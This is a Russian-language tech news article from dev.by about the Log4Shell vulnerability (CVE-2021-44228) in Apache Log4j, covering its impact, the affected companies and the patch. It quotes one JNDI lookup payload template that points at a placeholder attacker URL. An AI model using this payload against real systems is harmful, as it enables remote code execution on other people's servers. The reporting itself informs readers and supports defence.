Дапамажыце dev.by 🤍
Падтрымаць

Новая 0day-уязвимость затрагивает миллионы приложений, крупнейшие компании

Критическую уязвимость нулевого дня, получившую название Log4Shell, недавно обнаружили ИБ-специалисты Alibaba Cloud. При успешной эксплуатации злоумышленники могут запускать на целевом устройстве произвольный код, например внедрять вирусы-вымогатели и криптомайнеры, и получать контроль над атакуемыми серверами. Первые реальные атаки с её использованием Cisco и Cloudflare зафиксировали две недели назад 1 и 2 декабря.

Пакінуць каментарый
Новая 0day-уязвимость затрагивает миллионы приложений, крупнейшие компании

Критическую уязвимость нулевого дня, получившую название Log4Shell, недавно обнаружили ИБ-специалисты Alibaba Cloud. При успешной эксплуатации злоумышленники могут запускать на целевом устройстве произвольный код, например внедрять вирусы-вымогатели и криптомайнеры, и получать контроль над атакуемыми серверами. Первые реальные атаки с её использованием Cisco и Cloudflare зафиксировали две недели назад 1 и 2 декабря.

Уязвимости присвоен код CVE-2021-44228 и максимальный уровень опасности по шкале CVSS. Она кроется в библиотеке Apache Log4j, которую используют для ведения логов миллионы Java-приложений.

Для атаки достаточно заставить приложение внести в журнал лишь одну строку кода в формате ${jndi:ldap://[attacker_URL]}, что позволит в дальнейшем интегрировать в него собственный код. В открытый доступ уже выложены рабочие эксплойты, а злоумышленники активно сканируют сеть в поисках уязвимых подключённых устройств. Эксперты по кибербезопасности ожидают, что в ближайшие дни атаки на подверженные системы участятся.

Уязвимость затрагивает Amazon, Apple, Steam, Minecraft, Tesla, Red Hat и множество других компаний, в софте которых используется библиотека. К примеру, в случае Minecraft взломать серверы и компьютеры геймеров можно, отправив сообщение с кодом в окно чата.

Особую серьёзность уязвимости придаёт то, насколько она проста в эксплуатации (атаку может осуществить даже неопытный хакер), насколько обширный контроль может обеспечить злоумышленнику и насколько вездесуща сама библиотека, поэтому потенциальный ущерб огромен.

Apache Foundation в прошлую пятницу выпустила патч и советует разработчикам обновить библиотеку до версии 2.15.0. Если сделать это нет возможности, рекомендуется перевести параметр log4j2.formatMsgNoLookups в значение true.

Чытайце таксама
Беларусь займае другое месца па колькасці кібератак у СНД
Беларусь займае другое месца па колькасці кібератак у СНД
Беларусь займае другое месца па колькасці кібератак у СНД
WhatsApp тэстуе функцыю гасцявых чатаў — перапісвацца можна без акаўнта
WhatsApp тэстуе функцыю гасцявых чатаў — перапісвацца можна без акаўнта
WhatsApp тэстуе функцыю гасцявых чатаў — перапісвацца можна без акаўнта
Іран пагражае ўдарамі па тэхгігантах ЗША, называе іх законнымі мэтамі
Іран пагражае ўдарамі па тэхгігантах ЗША, называе іх законнымі мэтамі
Іран пагражае ўдарамі па тэхгігантах ЗША, называе іх законнымі мэтамі
Google закрыла найбуйнейшую ўгоду ў сваёй гісторыі: набыла Wiz за $32 млрд
Google закрыла найбуйнейшую ўгоду ў сваёй гісторыі: набыла Wiz за $32 млрд
Google закрыла найбуйнейшую ўгоду ў сваёй гісторыі: набыла Wiz за $32 млрд

Хочаце паведаміць важную навіну? Пішыце ў Telegram-бот

Галоўныя падзеі і карысныя спасылкі ў нашым Telegram-канале

Абмеркаванне
Каментуйце без абмежаванняў

Рэлацыраваліся? Цяпер вы можаце каментаваць без верыфікацыі акаўнта.

Каментарыяў пакуль няма.